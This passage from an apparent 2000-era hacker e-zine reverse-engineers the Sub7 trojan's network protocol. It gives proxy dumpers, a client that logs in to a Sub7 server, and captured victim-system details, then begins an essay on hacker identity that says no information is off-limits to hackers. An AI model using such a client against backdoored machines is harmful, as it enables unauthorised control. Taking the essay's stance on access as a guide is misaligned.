      Server: [PWD] // This is obviously the server telling the client that it
      can't connect until the correct password is sent. //
      
      Client: [PWDhello] // Here, the client sends back the correct password. //
      
      Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
      // The client now knows that it has connected, and the server is ready to
      accept commands. //
      
      // This next part will need to be looked at carefully. Pay attention to the
      two characters after the colon in each client request:
      Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. //
      Server: [user clicked : Yes.] // Self explanatory. This is shoved straight
      into the status bar at the bottom of the client window //
      
      Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. //
      Server: [user clicked : No.]
      
      Client: [MW:53titleZJXXtext] // "Yes, No, Cancel" button, "error" icon. The 1
      has changed to the three. Let's not make assumptions yet... //
      Server: [user clicked : Yes.]
      
      Client: [MW:03titleZJXXtext] // "OK" button, "error" icon. The 5 has changed
      to 0. It's fairly safe to assume that the first character represents which
      button combo, and the second the icon. //
      Server: [user clicked : Ok.] // Surprise, surprise. //
      [snip]
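
      An added example, not part of the tutorial or of Sub7 itself, that
      decodes the exchange above the way an analyst would when recognising
      this traffic in a capture: a classifier for the fixed strings in each
      line (PWD prompt, password reply, connection banner, MW request, click
      report) and a decoder for MW requests using the layout inferred from the
      dump (two digits, title, the literal separator "ZJXX", text). The
      separator and the digit meanings are assumptions read off the dump, and
      the sample lines are the captured ones re-typed as constructed input.

```c
/* Added example (not from the tutorial or Sub7): classify and decode the relayed lines. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SUB7_FIELD_MAX 256

typedef enum {
    SUB7_UNKNOWN = 0,
    SUB7_PWD_PROMPT,   /* server: "PWD"                                 */
    SUB7_PWD_REPLY,    /* client: "PWD<password>"                       */
    SUB7_BANNER,       /* server: "connected. ... version: ..."         */
    SUB7_MSGBOX,       /* client: "MW:<buttons><icon><title>ZJXX<text>" */
    SUB7_CLICK         /* server: "user clicked : <button>."            */
} sub7_kind;

typedef struct {
    int  buttons;      /* first digit: 5 = Yes/No/Cancel, 0 = OK (as seen in the dump) */
    int  icon;         /* second digit: 1 = warning, 3 = error (as seen in the dump)   */
    char title[SUB7_FIELD_MAX];
    char text[SUB7_FIELD_MAX];
} sub7_mw;

/* Classify one relayed line by the fixed strings observed in the dump. */
sub7_kind sub7_classify(const char *line)
{
    if (strcmp(line, "PWD") == 0)                  return SUB7_PWD_PROMPT;
    if (strncmp(line, "PWD", 3) == 0)              return SUB7_PWD_REPLY;
    if (strncmp(line, "connected. ", 11) == 0 && strstr(line, "version:") != NULL)
                                                   return SUB7_BANNER;
    if (strncmp(line, "MW:", 3) == 0)              return SUB7_MSGBOX;
    if (strncmp(line, "user clicked : ", 15) == 0) return SUB7_CLICK;
    return SUB7_UNKNOWN;
}

/* Decode an MW request. The layout (two digits, title, literal "ZJXX", text)
 * is inferred from the dump, not taken from any specification.
 * Returns 0 on success, negative when the line does not fit that layout. */
int sub7_parse_mw(const char *msg, sub7_mw *out)
{
    const char *body, *sep;
    size_t tlen, xlen;

    memset(out, 0, sizeof *out);
    if (strncmp(msg, "MW:", 3) != 0) return -1;
    body = msg + 3;
    if (!isdigit((unsigned char)body[0]) || !isdigit((unsigned char)body[1])) return -2;
    out->buttons = body[0] - '0';
    out->icon    = body[1] - '0';
    body += 2;
    sep = strstr(body, "ZJXX");
    if (sep == NULL) return -3;                    /* no title/text separator */
    tlen = (size_t)(sep - body);
    xlen = strlen(sep + 4);
    if (tlen >= SUB7_FIELD_MAX || xlen >= SUB7_FIELD_MAX) return -4;
    memcpy(out->title, body, tlen);    out->title[tlen] = '\0';
    memcpy(out->text, sep + 4, xlen);  out->text[xlen]  = '\0';
    return 0;
}

/* Decode into a static record (NULL on failure) so fields can be read inline. */
const sub7_mw *sub7_mw_decode(const char *msg)
{
    static sub7_mw rec;
    return sub7_parse_mw(msg, &rec) == 0 ? &rec : NULL;
}

static const char *button_name(int b) { return b == 5 ? "Yes, No, Cancel" : b == 0 ? "OK" : "unknown"; }
static const char *icon_name(int i)   { return i == 1 ? "warning" : i == 3 ? "error" : "unknown"; }

int main(void)
{
    /* The exchange captured above, re-typed as constructed sample input. */
    static const struct { const char *side, *line; } dump[] = {
        { "Server", "PWD" },
        { "Client", "PWDhello" },
        { "Server", "connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1" },
        { "Client", "MW:51titleZJXXtext" },
        { "Server", "user clicked : Yes." },
        { "Client", "MW:53titleZJXXtext" },
        { "Client", "MW:03titleZJXXtext" },
        { "Server", "user clicked : Ok." },
    };
    size_t i;
    for (i = 0; i < sizeof dump / sizeof dump[0]; i++) {
        const sub7_mw *mw = sub7_mw_decode(dump[i].line);
        printf("%s: kind=%d", dump[i].side, (int)sub7_classify(dump[i].line));
        if (mw != NULL)
            printf("  buttons=\"%s\" icon=\"%s\" title=\"%s\" text=\"%s\"",
                   button_name(mw->buttons), icon_name(mw->icon), mw->title, mw->text);
        printf("\n");
    }
    return 0;
}
```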
      
      Now we'll break down the structure of all messages a bit more. Make sure you
      save the dump of the protocol somewhere for later (you might need it). From
      what we have seen thus far most of this protocol uses regular alphanumeric
      characters. To see if there are any terminating characters to divide messages
      we will need to obtain a hex dump of a few messages. Here's the modified
      version of dumpprot.c that will do what we want (keep the old one):
      //------------------------------- *snip* -------------------------------
      // dumphex.c
      #include <winsock.h>
      #include <conio.h>  // getch()
      #include <stdio.h>
      #include <stdlib.h> // exit()
      #include <string.h> // memset(), memcpy()
      
      // This program acts like a proxy. It dumps all traffic to stdout.
      #define LOOP_BACK "127.0.0.1"
      #define LIS_PORT 2000
      #define CON_PORT 27374
      #define MAX_PACKET_SIZE 2048
      
      void fatal_error(char *msg);
      void bnd_n_lsn(int sock, int port);
      int connect_sock(int sock, char *host, int port);
      void server_side_thread(void *param);
      void client_side_thread(void *param);
      
      int ss, cs, ls; // Server socket, client socket, listen socket.
      void main()
      {
              WSADATA data; 
              WORD ver;
              DWORD thid; // CreateThread writes a 32-bit thread id through the LPDWORD below
              HANDLE h;
              struct sockaddr_in peer;
              int szpeer;
              ver = MAKEWORD(1, 1);         
              if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock.");
              if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
              if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
              if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
      
              // Wait for connect from client.
              printf("Waiting for connection...");
              bnd_n_lsn(ls, LIS_PORT);
              szpeer = sizeof(peer);
              do
              {
                      cs = accept(ls, (struct sockaddr *)&peer, &szpeer);
              } while(cs == -1);
              printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr));
              closesocket(ls); // We won't be needing this...
      
              // Now, connect the server socket.
              printf("Connecting to [%s]...", LOOP_BACK);
              connect_sock(ss, LOOP_BACK, CON_PORT);
              // We can now begin relaying.
              printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK);
      
              // Start threads and wait for a key to be pressed.
              h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
              SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
              h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
              SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
              getch();
      
              // Clean up a bit.
              closesocket(ss);
              closesocket(cs);
              return; // Exit
      }
      
      void fatal_error(char *msg)
      {
              printf("Fatal error: %s\n", msg);
              exit(1);
      }
      
      void bnd_n_lsn(int sock, int port) // Bind and list socket
      {
              struct sockaddr_in addr;
              int c = 0;
              
              memset((char *)&addr,'0', sizeof(addr));
      
              addr.sin_family = AF_INET;
              addr.sin_addr.s_addr = INADDR_ANY;
              addr.sin_port = htons(port);
      
              if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket.");
              if (listen(sock, 20) == -1) fatal_error("Error listening.");
      }
      
      int connect_sock(int sock, char *host, int port)
      {
              struct sockaddr_in addr;
              struct hostent *he;     
      
              memset(&addr, '0', sizeof(addr));
      
              addr.sin_family = AF_INET;
              addr.sin_addr.s_addr = inet_addr(host);
              addr.sin_port = htons(port);
      
              if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
              else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");  
              if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1;
              return 0;
      }
      
      void server_side_thread(void *param)
      {
              char buf[MAX_PACKET_SIZE];
              int r, c;
              do
              {
                      memset((char *)&buf, 0, MAX_PACKET_SIZE);
                      r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0);
                      if (r > 0)
                      {
                              c = 0;
                              printf("Server: [");
                              do
                              {
                                      printf("%x ", buf[c]);
                                      c++;
                              } while(c < r);
                              printf("]\n", buf);
                              send(cs, (char *)&buf, r, 0); // Forward to server socket
                      }
              } while(r != -1);
              printf("Server socket died.\n");
              exit(0);
      }
      
      void client_side_thread(void *param)
      {
              char buf[MAX_PACKET_SIZE];
              int r, c;
              do
              {
                      memset((char *)&buf, 0, MAX_PACKET_SIZE);
                      r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0);
                      if (r > 0)
                      {
                              c = 0;
                              printf("Client: [");
                              do
                              {
                                      printf("%x ", buf[c]);
                                      c++;
                              } while(c < r);
                              printf("]\n", buf);
                              send(ss, (char *)&buf, r, 0); // Forward to server socket
                      }
              } while(r != -1);
              printf("Client socket died.\n");
              exit(0);
      }
      //------------------------------- *snip* -------------------------------
      Recompile, run, and connect like before. This time though, don't do anything
      but connect (we only need a few messages). The output should look something
      like this:
      
      [snip]
      Waiting for connection...accepted from [127.0.0.1].
      Connecting to [127.0.0.1]...
      Linked: [127.0.0.1]<->[127.0.0.1]
      Server: [50 57 44 ]
      Client: [50 57 44 68 65 6c 6c 6f ]
      Server: [63 6f 6e 6e 65 63 74 65 64 2e 20 32 30 3a 32 32 2e 30 34 20 2d 20 41 70
      72 69 6c 20 35 2c 20 32 30 30 30 2c 20 57 65 64 6e 65 73 64 61 79 2c 20 76 65 72
      73 69 6f 6e 3a 20 47 4f 4c 44 20 32 2e 31 ]
      [snip]
      
      It looks as though there are no terminating characters, so the messages must
      be told apart by the packets they arrive in.
      Let's take a look at the message box message again:
      MW:51titleZJXXtext
      
      The format is probably:
      MW:<button><icon><title>ZJXX<text>
      
      <button> - character representing the button combo.
      <icon> - character representing the icon.
      <title> - string to be displayed in the message box title.
      <text> - string to be displayed in the body of the message box.
      
      Back to the password prompt: what happens if the password is incorrect?
      [snip]
      Server: [PWD]
      Client: [PWDsfdssdf]
      Server: [POPUP incorrect password...]
      [snip]
      
      Now, the client doesn't display any popup. In fact, I see no "incorrect
      password" message anywhere. I haven't gone into this any further, but the
      bottom line is that this reply is the indication that the password was
      wrong, and the connection is then killed.
      
      Well, that concludes what we will learn about that part of the protocol. Now
      for some source code. All it does is connect to a Sub7 server and prompt
      for a password (if required). Yes, it is pointless, but it is also
      educational. So read it.
      
      //------------------------------- *snip* -------------------------------
      // subc.c
      #include <stdio.h>
      #include <stdlib.h>  // exit(), atoi()
      #include <string.h>  // memset(), strcmp(), strncmp(), strlen(), strcspn()
      #include <winsock.h>
      
      #define BUF_LEN 300
      #define INPUT_LEN 256
      
      void fatal_error(char *msg);
      int connect_sock(SOCKET sock, char *host, int port);
      void start_winsock(void);
      
      #define CONNECTION_PREFIX "connected."
      
      int main(int argc, char *argv[])
      {
              SOCKET s;
              int l, r;
              char buf[BUF_LEN];
              char input[INPUT_LEN];
              char tmp[INPUT_LEN + 4]; // "PWD" + longest input + terminator
              if (argc < 3)
              {
                      printf("usage: subc <host> <port>\n");
                      exit(1);
              }
              start_winsock();
              if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) fatal_error("Could not create socket.");
              printf("Connecting...");
              connect_sock(s, argv[1], atoi(argv[2]));
              printf("done.\n");
              l = 0;
              do
              {
                      memset(buf, 0, BUF_LEN);
      
                      // We don't quite fill the buffer to the top, so that it is
                      // always null-terminated.
                      r = recv(s, buf, BUF_LEN - 1, 0);
                      if (r > 0)
                      {
                              if (!strcmp(buf, "PWD"))
                              {
                                      printf("Enter password: ");
                                      // fgets() instead of gets(): a bounded read. Strip the newline.
                                      if (fgets(input, INPUT_LEN, stdin) == NULL) fatal_error("No password given.");
                                      input[strcspn(input, "\r\n")] = '\0';
                                      sprintf(tmp, "PWD%s", input); // tmp is sized for the longest input
                                      send(s, tmp, (int)strlen(tmp), 0);
                              }
                              else if (!strcmp(buf, "POPUP incorrect password..."))
                              {
                                      printf("Incorrect password.\n");
                                      closesocket(s);
                                      exit(1);
                              }
                              else if (!strncmp(buf, CONNECTION_PREFIX, strlen(CONNECTION_PREFIX)))
                              {
                                      printf("%s\n", buf);
                                      l = 1; // Connection successful!
                              }
                              else printf("%s\n", buf); // Misc. messages
                      }
                      else fatal_error("Socket died."); // 0 = closed by peer, SOCKET_ERROR = failure
                      if (send(s, "", 0, 0) == SOCKET_ERROR) fatal_error("Socket died.");
              } while(!l);
              closesocket(s);
              WSACleanup();
              return 0;
      }
      
      void fatal_error(char *msg)
      {
              printf("Fatal error: %s\n", msg);
              exit(1);
      }
      
      int connect_sock(SOCKET sock, char *host, int port)
      {
              struct sockaddr_in addr;
              struct hostent *he;
      
              memset(&addr, 0, sizeof(addr)); // Zero bytes, not the character '0'.
      
              addr.sin_family = AF_INET;
              addr.sin_port = htons((u_short)port);
      
              // Accept either a host name or a dotted-quad address.
              if ((he = gethostbyname(host)) != NULL) memcpy(&addr.sin_addr, he->h_addr, he->h_length);
              else if ((addr.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) fatal_error("Invalid host.");
              if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) fatal_error("Error connecting.");
              return 0;
      }
      
      void start_winsock(void)
      {
              WSADATA wsaData;
              WORD wVersionRequested;
              wVersionRequested = MAKEWORD(1, 1);
              // WSAStartup() returns 0 on success and an error code otherwise.
              if (WSAStartup(wVersionRequested, &wsaData) != 0) fatal_error("Unable to initialise Winsock.");
      }
      //------------------------------- *snip* -------------------------------
      
      Run dumpprot (the old version, not dumphex). Connect as described earlier in
      this text. Click on the "connection" menu on the left of the client. Select
      the "get pc info" item. Click on "retrieve". dumpprot's output should be
      something like this:
      [snip]
      Client: [GMI]
      Server: [GMIMICHAEL
      Michael
      C:\WINDOWS
      C:\WINDOWS\SYSTEM
      Michael
      
      4.0 (1111. B)
      Windows 95
      
      800,600
      
      24
      CyrixInstead
      234.0 MHz
      2,150,768,640 bytes
      1,955,995,648 bytes
      1
      ]
      [snip]
      
      This is all pretty straightforward, but we must find which character
      terminates each line (it is either 0xd or 0xa, or both). Run dumphex and do
      the same. Your output should look like this:
      [snip]
      Client: [47 4d 49 ]
      Server: [47 4d 49 4d 49 43 48 41 45 4c d a 4d 69 63 68 61 65 6c d a 43 3a 5c 57
      49 4e 44 4f 57 53 d a 43 3a 5c 57 49 4e 44 4f 57 53 5c 53 59 53 54 45 4d d a 4d
      69 63 68 61 65 6c d a d a 34 2e 30 20 28 31 31 31 31 2e 20 42 29 d a 57 69 6e 64
       6f 77 73 20 39 35 d a d a 38 30 30 2c 36 30 30 d a d a 32 34 d a 43 79 72 69 78
       49 6e 73 74 65 61 64 d a 32 33 31 2e 30 20 4d 48 7a d a 32 2c 31 35 30 2c 37 36
       38 2c 36 34 30 20 62 79 74 65 73 d a 31 2c 39 35 36 2c 35 31 39 2c 39 33 36 20
      62 79 74 65 73 d a 31 d a ]
      [snip]
      
      The first line is 10 characters long. If we count 10 bytes into the dump we
      find the sequence "\xd\xa" (in C notation). This terminates the lines. The
      rest is pretty simple:
      Server: [GMICHOPSUI // After "GMI" is the m$ networking workstation name //
      Chopsuicide // Currently logged in m$ networking user //
      C:\WINDOWS // Windows directory //
      C:\WINDOWS\SYSTEM // System directory //
      Chopsui-cide // Name Windows is registered to //
      The Mad Miget Mafia // Company this person comes from //
      4.0 (1111. B) // Version information //
      Windows 95 // Version information //
       // Windows "key"? Comes up blank on my system //
      800,600 // Screen resolution //
       // DirectX version //
      24 // Bit depth in bpp //
      CyrixInstead // CPU vendor info //
      234.0 MHz // Guessed CPU speed. Not very accurate. //
      2,150,768,640 bytes // Size of C: drive //
      1,955,995,648 bytes // Available space //
      1 // Number of clients connected //
      ]
      
      As seems typical of the Sub7 client, all these values appear to be shoved
      straight into their respective labels. It also performs no sanity checking,
      i.e., it updates the info even if it did not request it.
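      The two message shapes worked out above, the "MW:" popup and the CRLF-separated
      "GMI" reply, parsed from captured bytes by a small portable C program. This is an
      added example, not code from the original text; the "GMI" sample is constructed
      from the field order decoded above, and the hex decoder reads dumphex's "%x "
      output format so a saved dump can be fed back in.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define MAX_MSG 512      /* longest title, text or field we keep */
#define MAX_FIELDS 32    /* the GMI reply above carries 17 fields */

/* Decode the body of a dumphex line ("47 4d 49 d a": space-separated hex,
 * one or two digits per byte, exactly as dumphex prints it) into out[].
 * Returns the byte count, or -1 on malformed input or overflow. */
int hex_dump_to_bytes(const char *dump, unsigned char *out, int max)
{
    int n = 0;
    const char *p = dump;
    while (*p) {
        char *end;
        long v;
        while (isspace((unsigned char)*p)) p++;
        if (!*p) break;
        v = strtol(p, &end, 16);
        if (end == p || v < 0 || v > 255 || n >= max) return -1;
        out[n++] = (unsigned char)v;
        p = end;
    }
    return n;
}

struct mw_msg {
    char button, icon;                 /* one-character button-combo and icon selectors */
    char title[MAX_MSG], text[MAX_MSG];
};

/* Parse MW:<button><icon><title>ZJXX<text>. Nothing terminates a message, so the
 * caller passes the packet length. If the title itself contains "ZJXX" the format
 * is ambiguous; the first occurrence wins. Returns 0 on success, -1 otherwise. */
int parse_mw(const unsigned char *buf, int len, struct mw_msg *m)
{
    const char *s = (const char *)buf;
    int i, sep = -1, title_len, text_len;

    if (len < 9 || memcmp(s, "MW:", 3) != 0) return -1;   /* 3 + 2 + strlen("ZJXX") */
    m->button = s[3];
    m->icon = s[4];
    for (i = 5; i + 4 <= len; i++)
        if (memcmp(s + i, "ZJXX", 4) == 0) { sep = i; break; }
    if (sep < 0) return -1;
    title_len = sep - 5;
    text_len = len - (sep + 4);
    if (title_len >= MAX_MSG || text_len >= MAX_MSG) return -1;
    memcpy(m->title, s + 5, title_len); m->title[title_len] = '\0';
    memcpy(m->text, s + sep + 4, text_len); m->text[text_len] = '\0';
    return 0;
}

/* Split a "GMI" reply into its CRLF-terminated fields. Empty fields are kept,
 * because a blank line (e.g. the DirectX version) still occupies its position.
 * Returns the field count, or -1 on a missing prefix or an unterminated tail. */
int split_gmi(const unsigned char *buf, int len, char fields[][MAX_MSG], int max_fields)
{
    int start = 3, n = 0;

    if (len < 3 || memcmp(buf, "GMI", 3) != 0) return -1;
    while (start < len) {
        int i, end = -1;
        for (i = start; i + 1 < len; i++)
            if (buf[i] == '\r' && buf[i + 1] == '\n') { end = i; break; }
        if (end < 0 || n >= max_fields || end - start >= MAX_MSG) return -1;
        memcpy(fields[n], buf + start, end - start);
        fields[n][end - start] = '\0';
        n++;
        start = end + 2;
    }
    return n;
}

/* Constructed sample reply (not a real capture) with the 17 fields in the order
 * the text decodes them: workstation, user, windir, sysdir, owner, company,
 * version, version, key, resolution, DirectX, bpp, CPU, speed, size, free, clients. */
static const char SAMPLE_GMI[] =
    "GMI" "WORKSTN\r\n" "user\r\n" "C:\\WINDOWS\r\n" "C:\\WINDOWS\\SYSTEM\r\n"
    "Registered Owner\r\n" "\r\n" "4.0 (1111. B)\r\n" "Windows 95\r\n" "\r\n"
    "800,600\r\n" "\r\n" "24\r\n" "CyrixInstead\r\n" "234.0 MHz\r\n"
    "2,150,768,640 bytes\r\n" "1,955,995,648 bytes\r\n" "1\r\n";

int main(void)
{
    unsigned char bytes[16];
    struct mw_msg m;
    char fields[MAX_FIELDS][MAX_MSG];
    const char *mw = "MW:51titleZJXXtext";   /* the message box message from the text */
    int n, i;

    n = hex_dump_to_bytes("47 4d 49 d a", bytes, (int)sizeof bytes);
    printf("decoded %d bytes; line ends with 0x%02x 0x%02x\n", n, bytes[3], bytes[4]);
    if (parse_mw((const unsigned char *)mw, (int)strlen(mw), &m) == 0)
        printf("MW: button=%c icon=%c title=\"%s\" text=\"%s\"\n", m.button, m.icon, m.title, m.text);
    n = split_gmi((const unsigned char *)SAMPLE_GMI, (int)sizeof SAMPLE_GMI - 1, fields, MAX_FIELDS);
    for (i = 0; i < n; i++) printf("GMI field %2d: \"%s\"\n", i + 1, fields[i]);
    return 0;
}
```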
      
      Well, that concludes this text. I hope you have learned something here, and
      hope that when you know more you too share your knowledge with others.
      
      =============================================================================
      
      
      @HWA      
      
263.0  Elf Qrin: The meaning of being a hacker
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       HACKER BEING
       on the meaning of being a hacker
       by Valerio "Elf Qrin" Capello (http://www.ElfQrin.com)
       Copyright (C) 1999 Valerio Capello
       First written: 23JAN2000
       v1.1eng 26MAR2000
       This is a translation from the original Italian version v1.5 r23JAN2000 
       (first written: 31AUG1999-09SEP1999)
       Supervisor for the English language: SirD. 

       Latest version available from: http://www.ElfQrin.com/docs/BeingHacker.html 


       "But did you, in your three-piece psychology and 1950's
       technobrain, ever take a look behind the eyes of the hacker?
       Did you ever wonder what made him tick,
       what forces shaped him, what may have molded him?
       I am a hacker, enter my world..."
       ("The Conscience of a Hacker", The Mentor) 


       "Fear them not therefore: for there is nothing covered, that
       shall not be revealed; and hid, that shall not be known"
       (Matthew 10:26) 



       THE HACKER 

       Another idiot has been locked up because of committing a senseless act 
       with little or no thought to the consequences. Law enforcement needs to 
       look good, the news becomes public domain and the press is unleashed, 
       using attention grabbing headlines like: "Computer terrorist busted", or 
       better, a "hacker". 

       Not only is the term misused, but it is usually only understood to be a 
       mere synonym for "computer pirate", which is not only limiting, but 
       completely wrong. Few people, even those who would define themselves as 
       such, really know what "being a hacker" means. 

       The WWWebster Online Dictionary (http://www.m-w.com/), at the "hacker" 
       entry says: 

            Main Entry: hacker Pronunciation: 'ha-k&r Function: noun Date: 14th 
            century 1 : one that hacks 2 : a person who is inexperienced or 
            unskilled at a particular activity "a tennis hacker" 3 : an expert 
            at programming and solving problems with a computer 4 : a person who 
            illegally gains access to and sometimes tampers with information in 
            a computer system

       Among the various meanings quoted above, (besides definition 1, which is 
       obvious...), definition 4 is the one which generally corresponds to the 
       idea of "the hacker" that the majority of people have, while definition 
       3, is the one which is actually closer to the real meaning of "hacker", 
       even if it is still rather limiting. 

       A dictionary rarely gives a definitive answer, but it is always a good 
       start. For a more precise definition we can consult a specific dictionary 
       such as the Jargon File, the most prestigious dictionary of hacker 
       terminology, "a comprehensive compendium of hacker slang illuminating 
       many aspects of hackish tradition, folklore, and humor", begun by Raphael 
       Finkel of Stanford University in 1975, then passed into the care of Don 
       Woods of MIT, until it saw print in 1983 under the title "The Hacker's 
       Dictionary" (Harper & Row CN 1082, ISBN 0-06-091082-8, also known in the 
       scene as "Steele-1983"). 

       The on-line hacker Jargon File, version 2.9.10, 01 JUL 1992 (part of the 
       Project Gutenberg), at the "hacker" entry says: 

            :hacker: [originally, someone who makes furniture with an axe] n. 1. 
            A person who enjoys exploring the details of programmable systems 
            and how to stretch their capabilities, as opposed to most users, who 
            prefer to learn only the minimum necessary. 2. One who programs 
            enthusiastically (even obsessively) or who enjoys programming rather 
            than just theorizing about programming. 3. A person capable of 
            appreciating {hack value}. 4. A person who is good at programming 
            quickly. 5. An expert at a particular program, or one who frequently 
            does work using it or on it; as in `a UNIX hacker'. (Definitions 1 
            through 5 are correlated, and people who fit them congregate.) 6. An 
            expert or enthusiast of any kind. One might be an astronomy hacker, 
            for example. 7. One who enjoys the intellectual challenge of 
            creatively overcoming or circumventing limitations. 8. [deprecated] 
            A malicious meddler who tries to discover sensitive information by 
            poking around. Hence `password hacker', `network hacker'. See 
            {cracker}. 

       Since this is a specific dictionary, the definition of hacker here is 
       closer to its original meaning, even if it is necessary to extrapolate it 
       from the varied proposed meanings in order to obtain the closest and most 
       faithful interpretation. 

       A hacker is a person that loves to study all things in depth (definition 
       1), especially the more apparently meaningless details, to discover 
       hidden peculiarities, new features and weaknesses in them. For example, it 
       is possible to hack a book, by using it to level the legs of a table, 
       or to use the sharp edge of one of its pages to cut something. The main 
       point being that it is used for more than its conventional function of 
       being read. But more than this, a hacker soon learns that the same 
       techniques used for exploiting computer systems can be used to manipulate 
       people. This is the so-called social hacking. With a little skilled 
       psychology, the masters of "social hacking" can convince other people to 
       do what they want (within limits of course, and depending on the 
       abilities of the "social hacker"), in order to obtain the information 
       they require. This may sound like an unusual and unnatural practice, but 
       once you take into account that this is performed quite regularly, in 
       everyday life, by girlfriends, friends, teachers etc. to obtain what 
       they want from others, it's not that strange, even if hackers do use a 
       little more skill and technique. Another way of bringing hacking out from 
       the computer's world is the so-called vadding (the term is actually 
       rarely used, but the activity is widely practiced): this consists of 
       exploring places where the average person doesn't normally have access, 
       such as basements, roofs of public buildings, maintenance tunnels, 
       elevator wells and similar places. Sometimes, some of these activities 
       born inside the hacker scene grow and eventually separate, becoming new 
       entities, like phreaking, the term applied to the world of "hacking" 
       telephones and telephone systems, or carding, which is basically 
       "techno-credit card fraud": very illegal and risky. In short, a hacker 
       tends to use his skills beyond the computer context as well, applying 
       hacking techniques anywhere to discover what is normally hidden from the 
       common man. For a hacker, the ability to reason, harness his full brain 
       capacity and keep his mind at maximum efficiency is most important. With 
       a few exceptions, it is unusual for a hacker to smoke, use drugs, or 
       drink excessively (however, beer appears to be the preferred choice when 
       alcohol is drunk). Speaking of John Draper (a.k.a. "Captain Crunch", one 
       of the most legendary phreaker/hackers, famous for discovering that by 
       sending a tone of 2600Hz over the telephone lines of AT&T it was possible 
       to make free calls), Steven Levy says: "Cigarettes made him violent": 
       smoking next to him was extremely hazardous to your health... 

       A hacker is certainly a programming maniac (definition 2): once a 
       technique has been discovered, it is necessary to write a program that 
       exploits it. Hackers often spend many days and nights in front of a 
       computer, programming or experimenting with new techniques. After 
       spending so many hours in front of a computer, a hacker gains a 
       remarkable ability to analyze large amounts of data very quickly. The 
       ability to program quickly (definition 4) can be a characteristic of a 
       hacker, but is not necessarily always so. As far as a hacker is 
       concerned, it is faster to type on a keyboard than it is to write things 
       down, and many hackers spend quite a lot of time reflecting over, or 
       analyzing, previously written code while they are programming. Definition 
       5 is, in effect, a restrictive meaning of the word "hacker", since it 
       limits it to a single field (as in UNIX); it can however be considered 
       a specialization. Actually in these cases, especially when it concerns 
       true experts in a field, the terms wizard or guru are preferred. For 
       example, the designation "UNIX wizard" in the United States is also 
       recognized outside of the hacker environment and can be included in a 
       resume. 

       Definition 3 may be considered apart: a person that qualifies for this 
       definition is not necessarily a real hacker, but a very experienced 
       person with good knowledge, who is not necessarily able to develop 
       hacker techniques. To make it clearer, think about the differences 
       between a good author and someone that appreciates a good book. 

       Definition 7, together with definition 1, are the ones that get closer to 
       the real essence of the hacker. To study a system, to discover 
       weaknesses, the peculiarities and hidden features of it, and then use 
       them to go beyond its limits, with creativeness and imagination. This, in 
       a certain way, brings us directly to definition 8. The person with these 
       skills can use his knowledge to try to access information to which he 
       doesn't have the right to access, and here the discourse gets 
       complicated, because for a hacker there is no information which he does 
       not have the right to access. We will get back to this point later, when 
       we will speak about the "hacker ethic". 

       Finally, although it has nothing to do with the character of the hacker, 
       I would like to attract attention to definition 6; for a hacker, the term 
       hacker is always positive: if he speaks of a "hacker of astronomy", he 
       speaks of a true expert of that subject. Contrary to this, in everyday 
       language, according to definition 2 of the WWWebster dictionary, a 
       "hacker" in a certain field is a person that is not skilled in that 
       specific field. 

       After giving the definitions, the Jargon File provides more information 
       on the meaning of the word "hacker": 

            The term `hacker' also tends to connote membership in the global 
            community [...]. It also implies that the person described is seen 
            to subscribe to some version of the hacker ethic [...]. 

            It is better to be described as a hacker by others than to describe 
            oneself that way. Hackers consider themselves something of an elite 
            (a meritocracy based on ability), though one to which new members 
            are gladly welcome. There is thus a certain ego satisfaction to be 
            had in identifying yourself as a hacker (but if you claim to be one 
            and are not, you'll quickly be labeled {bogus}). [...] [or most 
            commonly, the most used term in these circumstances is "lamer", even 
            if next versions of the Jargon File use this term in a slightly 
            different context] 

       But, perhaps more than anything else, curiosity and above average 
       intelligence are the signatures of a true hacker. The hacker has an 
       almost physical need for knowledge of any kind. The hacker is most 
       certainly a voracious reader, even if his preference is only for 
       scientific matters or science fiction, and generally one would find many 
       shelves full of books in his room. But a hacker is not satisfied by the 
       "ready made" knowledge, the information that he finds in the books 
       written for the average person: a hacker wants it all, and collects all 
       possible information. Schools are institutions that are not able to 
       furnish all the information that a hacker needs. Governments and all 
       public or private institutions have the tendency to furnish the least 
       necessary information. On this point, Steven Levy in "Hackers, Heroes 
       of the Computer Revolution" (written in 1984), affirms that the hackers 
       "are possessed not merely by curiosity, but by a positive *lust to 
       know.*" 

       This idea is even clearer in these excerpts taken from what is 
       considered "the hacker's manifesto": "The Conscience of a Hacker" 
       (sometimes erroneously reported, in a nearly prophetic sense, as 
       "Mentor's Last Words"), written by The Mentor on January 8th 1986, and 
       published for the first time in the e-zine Phrack, Volume One, Issue 7, 
       Phile 3. This text collects in a few paragraphs a large part of the 
